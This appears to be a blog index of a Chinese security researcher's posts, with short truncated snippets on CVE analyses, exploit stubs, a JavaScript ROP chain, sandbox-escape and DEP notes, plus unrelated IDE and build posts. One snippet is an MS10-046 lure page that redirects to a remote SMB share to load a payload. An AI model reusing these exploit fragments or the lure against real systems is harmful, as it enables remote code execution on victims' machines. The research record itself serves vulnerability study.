原创 HP_imc 5.1_E0202 imf.dll recv packets integer overflow
imf.dll 版本 HP_iMC_PLAT_5.1_E0202_Standard_Windows_HP_iMC_PLAT_5.1_E0202_Standard_Windows漏洞彙編代碼:.text:003B4083
原创 看adobe sandbox的一點想法
adobe pdf的sandbox貌似是不會限制socket的,某技術paper上面說的 這樣感覺可以利用第三方程序的本地socket的漏洞來繞過sandbox。 例如某某播放軟件本地開了一個127.0.0.1的鏈接,存在溢出漏洞
原创 codeblocks ide for linux
我擦 經yourstar推薦 linux下的codeblocks果然是一個很好的ide 開發工具啊 之前寫代碼一直是用gtext,自己寫makefile 那個糾結。。。。 ubuntu下安裝codeblocks sudo ap
原创 Cve2012-0507 簡單分析
Cve2012-0507分析 影響版本 Jre update 30 before 觸發漏洞代碼 public class Exploit extends Applet { publicvoid init() {
原创 CVE-2011-2448 Adobe ShockwaveDirector File Parsing data of rcsl chunk multiple DOS vulnerabilities
Adobe Shockwave Player Director File Parsing data of rcsl chunk multiple DOS vulnerabilities CAL_ID: CAL-2011-0054 CVE
原创 ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability
/* Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability Date: 2012-3-25 Author: instruder Software Li
原创 CVE-2013-0636
http://www.adobe.com/support/security/bulletins/apsb13-06.html
原创 openjdk windows 編譯
前記 如果你不是閒着蛋疼最好不要在windows上面編譯,linux上面一會就編譯好了。。。。可是windows上面 只想說10個字“尼瑪” 出現問題了 可以直接改他的makefile和gmk 爺爺的 例如那個verify.r
原创 Well-known DEP-violating thunks
這幾天調試發現一個奇怪的現象,一個在數據區段執行的指令,在開啓了系統dep時 竟然還可以繼續執行,換成其他指令就不可以,而且執行時這個內存屬性仍舊是不可 執行屬性。同時按理指令是一條一條執行,但是這個指令
原创 MSVCRT:ROP - CN 修改ROP檢測標誌
function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn
原创 權限提升
普通權限在不需要任何驗證即啓動了一個高級別權限的進程 本身就存在了很大的風險。 權限存在交互 就很容易導致問題
原创 ms10_046_shortcut_icon_dllloader 這個其實很好用
<html><head><meta http-equiv="refresh" content="0;URL=\\192.168.1.105\tKVOwIzRc\"></head><body></body></html>
原创 cve2012-1876 leak mshtml base address and leak shellcode base address
leak mshtml base address leak shellcode base address 其中leak shellcode base 思路是聯合 http://www.vupen.com/blog/2
原创 當前多數殺軟主防存在的缺陷
見 鏈接 http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1
原创 亂猜
http://bbs.360safe.com/thread-111959-1-1.html iocode 0x222020 .text:000110C6 ; int __stdcall sub_110C6(int processi